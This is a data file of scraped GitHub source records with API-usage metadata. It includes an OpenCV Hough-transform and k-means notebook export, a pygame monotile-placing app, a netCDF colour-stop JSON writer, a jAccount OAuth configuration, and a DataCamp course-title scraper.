"tensorflow.shape", "line_number": 649, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 650, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 651, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 651, "usage_type": "attribute"}, {"api_name": "tensorflow.cond", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 657, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 657, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 658, "usage_type": "call"}, {"api_name": "tensorflow.cond", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 661, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 661, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 664, "usage_type": "attribute"}, {"api_name": "tensorflow.fill", "line_number": 665, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 666, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 667, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 678, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 678, "usage_type": "call"}, {"api_name": "tensorflow.while_loop", "line_number": 680, "usage_type": "call"}, {"api_name": "tensorflow.TensorShape", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.TensorShape", "line_number": 684, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 703, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 704, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 705, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 705, "usage_type": "attribute"}, 
{"api_name": "tensorflow.expand_dims", "line_number": 710, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 710, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 712, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 717, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 724, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 724, "usage_type": "call"}, {"api_name": "tensorflow.TensorShape", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.while_loop", "line_number": 727, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 733, "usage_type": "call"}, {"api_name": "tensorflow.cond", "line_number": 736, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 736, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 736, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 742, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 742, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 743, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 744, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 749, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 750, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 751, "usage_type": "call"}, {"api_name": "tensorflow.map_fn", "line_number": 753, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 753, "usage_type": "attribute"}, {"api_name": "ops.get_tf_func", "line_number": 774, "usage_type": "call"}, {"api_name": "ops.get_tf_func", "line_number": 775, "usage_type": "call"}, {"api_name": "tensorflow.reduce_min", "line_number": 778, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 779, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 779, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 780, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 794, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 794, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 820, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 820, "usage_type": "attribute"}, {"api_name": "ops.get_tf_func", "line_number": 849, "usage_type": "call"}, {"api_name": "ops.get_tf_func", "line_number": 850, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 869, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 869, "usage_type": "attribute"}, {"api_name": "tensorflow.shape", "line_number": 882, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 888, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 888, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 915, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 919, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 921, "usage_type": "call"}]} +{"seq_id": "28328714388", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport math\n\n\n# ## Hough Transformation\n\n# In[13]:\n\n\n# Read image \nimg = cv2.imread('campo1.jpg', cv2.IMREAD_COLOR) # road.png is the filename\n# Convert the image to gray-scale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Find the 
edges in the image using canny detector\nedges = cv2.Canny(gray, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=120, minLineLength=10, maxLineGap=250)\n# Draw lines on the image\nfor line in lines:\n    x1, y1, x2, y2 = line[0]\n    cv2.line(img, (x1, y1), (x2, y2), (255,165,0), 3)\n# Show result\ncv2.imwrite(\"h1.jpg\", img)\n\n\n# \n\n# In[2]:\n\n\n# Read image \nimg = cv2.imread('campo2.jpg', cv2.IMREAD_COLOR) # campo2.jpg is the filename\n# Convert the image to gray-scale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Find the edges in the image using canny detector\nedges = cv2.Canny(gray, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=100, minLineLength=10, maxLineGap=250)\n# Draw lines on the image\nfor line in lines:\n    x1, y1, x2, y2 = line[0]\n    cv2.line(img, (x1, y1), (x2, y2), (0,165,255), 3)\n# Show result\ncv2.imwrite(\"h2.jpg\", img)\n\n\n# \n\n# In[22]:\n\n\n# Read image \nimg = cv2.imread('campo3.jpg', cv2.IMREAD_COLOR) # campo3.jpg is the filename\n# Convert the image to gray-scale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Find the edges in the image using canny detector\nedges = cv2.Canny(gray, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=120, minLineLength=10, maxLineGap=250)\n# Draw lines on the image\nfor line in lines:\n    x1, y1, x2, y2 = line[0]\n    cv2.line(img, (x1, y1), (x2, y2), (0,165,255), 2)\n# Show result\ncv2.imwrite(\"h3.jpg\", img)\n\n\n# \n\n# ## Defining the Hough transformation function \n\n# In[24]:\n\n\ndef hough_trans(image_in, image_out,thresh=100, color=(0,0,0), line_thickness=3):\n    # Read image \n    img = cv2.imread(image_in, cv2.IMREAD_COLOR) # image_in is the filename\n    # Convert the image to gray-scale\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    # Find the edges in the image using canny detector\n    edges = cv2.Canny(gray, 50, 200)\n    # Detect points that form a line\n    lines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=thresh, minLineLength=10, maxLineGap=250)\n    # Draw lines on the image\n    for line in lines:\n        x1, y1, x2, y2 = line[0]\n        cv2.line(img, (x1, y1), (x2, y2), color, line_thickness)\n    # Show result\n    cv2.imwrite(image_out, img)\n\n\n# In[25]:\n\n\nhough_trans(\"campo1.jpg\",\"test.jpg\")\n\n\n# ## K means for image segmentation \n\n# In[3]:\n\n\nimg = cv2.imread('frutas.jpg',cv2.IMREAD_COLOR)\nZ = img.reshape((-1,3))\nZ = np.float32(Z) \n# define criteria, number of clusters(K) and apply kmeans()\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\nK = 10\nret,label,center=cv2.kmeans(Z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n \n# Now convert back into uint8, and make original image\ncenter = np.uint8(center)\nres = center[label.flatten()]\nres2 = res.reshape((img.shape))\nlabel = label.reshape((img.shape[0],img.shape[1])) \ncv2.imshow('res2',res2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimg.shape\n\n\n# ## Extracting clusters from segmented image \n# \n# Apple and orange both share labels from the same cluster\n\n# In[5]:\n\n\ndef extractCluster(image,label_image,label):\n    component=np.zeros(image.shape,np.uint8)\n    component[label_image==label]=image[label_image==label]\n    return component\n\n\n# In[6]:\n\n\nextracted=extractCluster(img,label,0)\nextracted.shape\ncv2.imwrite('apple.jpg',extracted)\ncv2.imshow('res2',extracted)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# \n\n# In[ ]:\n\n\n\n\n", "repo_name": 
"Tepi994/text-mining-computer-vision", "sub_path": "HT4_HOUGH/Hough_Transformation.py", "file_name": "Hough_Transformation.py", "file_ext": "py", "file_size_in_byte": 3848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 67, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 85, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 87, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 115, "usage_type": "attribute"}, {"api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 115, "usage_type": "attribute"}, {"api_name": "cv2.kmeans", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.KMEANS_RANDOM_CENTERS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 120, "usage_type": "call"}, {"api_name": 
"cv2.imshow", "line_number": 124, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 143, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 153, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 154, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "33683858727", "text": "\nimport pygame as pg\nfrom math import cos, sin, sqrt, pi\nimport sys\n\n\nCOLORS = [(0, 0, 255), (255, 255, 255), (255, 165, 0),\n (0, 128, 0), (255, 255, 0), (255, 0, 0)]\nSIZE = 50\nFPS = 60\nROTATE_ANGLE = 60\nBACKGROUND_COLOR = \"grey30\"\n\n\nclass App:\n\n def __init__(self):\n pg.init()\n\n # Set the height and width of the screen\n screen_width = 800\n screen_height = 500\n self.screen = pg.display.set_mode([screen_width, screen_height])\n\n self.screen.fill(BACKGROUND_COLOR)\n\n self.clock = pg.time.Clock()\n self.game = Game(self)\n\n def update(self):\n self.game.update()\n self.clock.tick(FPS)\n\n def draw(self):\n self.game.draw()\n pg.display.flip()\n\n def check_events(self):\n for event in pg.event.get():\n if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):\n pg.quit()\n sys.exit()\n\n if event.type == pg.MOUSEBUTTONDOWN:\n self.game.mouse_click(pg.mouse.get_pos())\n\n if event.type == pg.KEYDOWN and self.game.player.tile != None:\n if event.key == pg.K_RIGHT:\n self.game.player.tile.rotate_right()\n if event.key == pg.K_LEFT:\n self.game.player.tile.rotate_left()\n if event.key == pg.K_SPACE:\n self.game.player.tile.flip()\n\n def run(self):\n while True:\n self.check_events()\n self.update()\n self.draw()\n\n\nclass Game():\n def __init__(self, app):\n self.app = app\n self.player = Player()\n self.tiles_group = pg.sprite.Group()\n self.player_group = pg.sprite.GroupSingle()\n\n def update(self):\n self.player.can_drop = self.collision_test()\n self.player.update()\n\n def draw(self):\n self.app.screen.fill(BACKGROUND_COLOR)\n self.tiles_group.draw(self.app.screen)\n self.player_group.draw(self.app.screen)\n\n def collision_test(self):\n if self.player.tile == None:\n return False\n\n collide = pg.sprite.spritecollide(\n self.player.tile, self.tiles_group, False, pg.sprite.collide_mask)\n return len(collide) == 0\n\n def mouse_click(self, mouse_pos):\n if self.player.tile:\n tile = self.player.generate_new_tile()\n self.tiles_group.add(tile)\n self.player_group.empty()\n self.player.tile = None\n return\n\n if self.app.screen.get_at(mouse_pos) != pg.color.Color(BACKGROUND_COLOR):\n for tile in self.tiles_group:\n pos_in_mask = mouse_pos[0] - \\\n tile.rect.x, mouse_pos[1] - tile.rect.y\n touching = tile.rect.collidepoint(\n *mouse_pos) and tile.tile_mask.get_at(pos_in_mask)\n if touching:\n # grab existing tile\n self.player.tile = tile\n self.tiles_group.remove(tile)\n self.player_group.add(self.player.tile)\n return\n else:\n # create a new player\n self.player.tile = Tile()\n self.player_group.add(self.player.tile)\n\n\nclass Player():\n\n def __init__(self):\n self.tile: Tile = None\n self.can_drop = True\n\n def generate_new_tile(self):\n tile = Tile()\n tile.update_surface(self.tile.rot, self.tile.flipped)\n tile.rect = self.tile.rect.copy()\n return 
tile\n\n    def update(self):\n        if self.tile == None:\n            return\n\n        self.tile.update_surface(\n            self.tile.rot, self.tile.flipped)\n        pos = pg.mouse.get_pos()\n        self.tile.rect.x = pos[0]\n        self.tile.rect.y = pos[1]\n\n        offset_x = self.tile.image.get_size()[0] - self.tile.rect.size[0]\n        offset_y = self.tile.image.get_size()[1] - self.tile.rect.size[1]\n        self.tile.rect.center = (self.tile.rect.x - offset_x / 2,\n                                 self.tile.rect.y - offset_y / 2)\n\n\nclass Tile(pg.sprite.Sprite):\n\n    def __repr__(self) -> str:\n        return f\"Rot:{self.rot}, flipped:{self.flipped}, image: {self.image}\"\n\n    def __init__(self):\n\n        super().__init__()\n\n        self.rot = 0\n        self.flipped = False\n\n        self.update_surface(self.rot, self.flipped)\n        self.image_orig = self.image.copy()\n        self.tile_mask = pg.mask.from_surface(self.image)\n        self.rect = self.image.get_rect()\n\n    def generate_image_copy(self):\n        image = self.image_orig.copy()\n        image = pg.transform.rotate(image, self.rot)\n        image = pg.transform.flip(image, self.flipped, False)\n        return image\n\n    def update_surface(self, rotation=0, flip=False):\n\n        image = pg.Surface((SIZE * 3.1, SIZE * 2.3), pg.SRCALPHA)\n        image.fill(\"pink\")\n\n        pg.draw.polygon(image, COLORS[rotation//60], Tile.draw_hat(\n            image.get_width() / 2, image.get_height() / 4.5))\n\n        pg.draw.lines(image, \"purple\" if flip else \"grey\", True, Tile.draw_hat(\n            image.get_width() / 2, image.get_height() / 4.5), 2)\n\n        pg.draw.circle(image, \"purple\" if flip else \"grey\",\n                       (image.get_width() / 2, image.get_height() / 2), SIZE/10)\n        image = pg.transform.rotate(image, rotation)\n        image = pg.transform.flip(image, flip, False)\n\n        self.rot = rotation\n        self.flipped = flip\n        self.image = image\n\n    def rotate_left(self):\n        rot = - ROTATE_ANGLE if self.flipped else ROTATE_ANGLE\n        self.rot = (self.rot + rot) % 360\n        self.update_surface(self.rot, self.flipped)\n\n    def rotate_right(self):\n        rot = ROTATE_ANGLE if self.flipped else -ROTATE_ANGLE\n        self.rot = (self.rot + rot) % 360\n        self.update_surface(self.rot, self.flipped)\n\n    def flip(self):\n        self.flipped = not self.flipped\n        self.update_surface(self.rot, self.flipped)\n\n    def draw_hat(x, y):\n\n        half = SIZE / 2\n        apotheme = SIZE * sqrt(3) / 2\n\n        # starting point\n        start_x = x\n        start_y = y\n\n        point1 = (start_x, start_y)\n        point2 = (start_x + (half * sin(pi / 6)),\n                  start_y - (half * cos(pi / 6)))\n        point3 = (point2[0] + SIZE, point2[1] + 0)\n        point4 = (point3[0] + half * cos(pi / 3),\n                  point3[1] + half * sin(pi / 3))\n        point5 = (point4[0] - apotheme * cos(pi / 6),\n                  point4[1] + apotheme * sin(pi / 6))\n        point6 = (point5[0],\n                  point5[1] + apotheme)\n        point7 = (point6[0] - half,\n                  point6[1])\n        point8 = (point7[0] - half * cos(pi / 3),\n                  point7[1] + half * sin(pi / 3))\n        point9 = (point8[0] - apotheme * cos(pi / 6),\n                  point8[1] - apotheme * sin(pi / 6))\n        point10 = (point9[0],\n                   point9[1] - apotheme)\n        point11 = (point10[0] - half,\n                   point10[1])\n        point12 = (point11[0] - half * cos(pi / 3),\n                   point11[1] - half * sin(pi / 3))\n        point13 = (point12[0] + apotheme * cos(pi / 6),\n                   point12[1] - apotheme * sin(pi / 6))\n        # print(\"size\", size)\n        # print(point4[0]-point12[0])\n        # print(point8[1]-point13[1])\n        return [point1, point2, point3, point4,\n                point5, point6, point7, point8, point9, point10, point11, point12, point13]\n\n\nif __name__ == \"__main__\":\n    app = App()\n    app.run()\n", "repo_name": "GuillaumeGSO/EinStein-Aperiodic-MonoTile", "sub_path": "pick_blocks.py", "file_name": "pick_blocks.py", "file_ext": "py", "file_size_in_byte": 7529, "program_lang": 
"python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.sprite.GroupSingle", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 82, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.color.Color", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.color", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 130, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 130, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 160, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.SRCALPHA", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 171, "usage_type": "call"}, {"api_name": "pygame.draw", 
"line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 174, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 177, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 177, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 200, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 207, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 207, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 208, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 208, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 210, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 210, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 211, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 211, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 212, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 212, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 213, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 213, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 218, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 218, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 219, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 219, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 220, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 220, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 221, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 221, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 226, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 226, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 227, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 227, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 228, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 228, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 229, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "10217425896", "text": "import numpy as np\nimport json\nfrom os.path import exists\n\ndef parseColor(vari):\n\tstops = [ np.percentile(vari, x) for x in [20, 40, 60, 80]]\n\tpalette = np.repeat( [0, 63, 127, 191, 255], 3)\n\treturn {'stops': stops, 'palette': palette.tolist()}\n\t\ndef printJson(vari, ofn):\n\tif exists(ofn):\n\t\treturn print(\"%s file exist\"%ofn)\n\n\tobj = parseColor(vari)\n\twith open( ofn, 'x') as f:\n\t\ttxt = json.dumps(obj)\n\t\tf.write(txt)\n\nif __name__ == '__main__':\n\tifn = 'file.nc'\n\titems = ['var1', 'var2']\n\n\tfrom scipy.io.netcdf import netcdf_file\n\twith netcdf_file( ifn, 'r') as f:\n\t\tfor itm in items:\n\t\t\tdata = f.variables[itm]\n\t\t\tprintJson(data[:], '_'+itm+'.json')\n", "repo_name": "hsinewu/earth", "sub_path": "scripts/make_json.py", "file_name": "make_json.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.percentile", "line_number": 6, "usage_type": 
"call"}, {"api_name": "numpy.repeat", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 11, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.io.netcdf.netcdf_file", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "3650108388", "text": "from authlib.integrations.django_client import OAuth\nfrom SJTUPlus.settings import JACCOUNT_CLIENT_ID, JACCOUNT_CLIENT_SECRET\n\n# documentation: https://docs.authlib.org/en/latest/client/django.html\n\noauth = OAuth()\noauth.register(\n name='jaccount',\n client_id=JACCOUNT_CLIENT_ID,\n client_secret=JACCOUNT_CLIENT_SECRET,\n access_token_url='https://jaccount.sjtu.edu.cn/oauth2/token',\n authorize_url='https://jaccount.sjtu.edu.cn/oauth2/authorize',\n api_base_url='https://api.sjtu.edu.cn/',\n client_kwargs={\n \"scope\": \"openid\",\n \"token_endpoint_auth_method\": \"client_secret_basic\",\n \"token_placement\": \"header\"\n }\n)\njaccount = oauth.jaccount\n", "repo_name": "SJTU-Plus/sjtu-plus", "sub_path": "SJTUPlus/oauth.py", "file_name": "oauth.py", "file_ext": "py", "file_size_in_byte": 684, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 75, "dataset": "github-code", "pt": "61", "api": [{"api_name": "authlib.integrations.django_client.OAuth", "line_number": 6, "usage_type": "call"}, {"api_name": "SJTUPlus.settings.JACCOUNT_CLIENT_ID", "line_number": 9, "usage_type": "name"}, {"api_name": "SJTUPlus.settings.JACCOUNT_CLIENT_SECRET", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "12951060394", "text": "from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\ndef scrape(url, lang):\n\tprint(\"Scraping url: {}\".format(url))\n\ttech = []\n\tlanguage = []\n\n\tr = requests.get(url)\n\tsoup = BeautifulSoup(r.text, 'html.parser')\n\t\n\tfor h4 in soup.findAll('h4', class_=\"course-block__title\"):\n\t\ttech.append(h4.text.strip())\n\t\tlanguage.append(lang)\n\n\n\treturn tech, language\n\ndef concat_lists(l1, l2):\n\treturn l1 + l2\n\t\ndef make_df(list1, list2, name1, name2):\n\tprint(\"creating the dataframe, names for columns: {}, {}\".format(name1, name2))\n\td = {name1:list1, name2:list2}\n\n\tdf = pd.DataFrame.from_dict(d, orient='index')\n\n\treturn df\n\n\nurl_1 = \"https://www.datacamp.com/courses/tech:r\"\nurl_2 = \"https://www.datacamp.com/courses/tech:python\"\n\nr_list, r_language = scrape(url_1, \"R\")\np_list, p_language = scrape(url_2, \"Python\")\n\ntech = concat_lists(r_list, p_list)\nlanguage = concat_lists(r_language, p_language)\n\ndf_coursenames = make_df(tech, language, \"Tech\", \"Language\")\ndf_coursenames = df_coursenames.transpose()\n\nprint(\"Data Frame Created looks like this:\")\nprint(df_coursenames)", "repo_name": 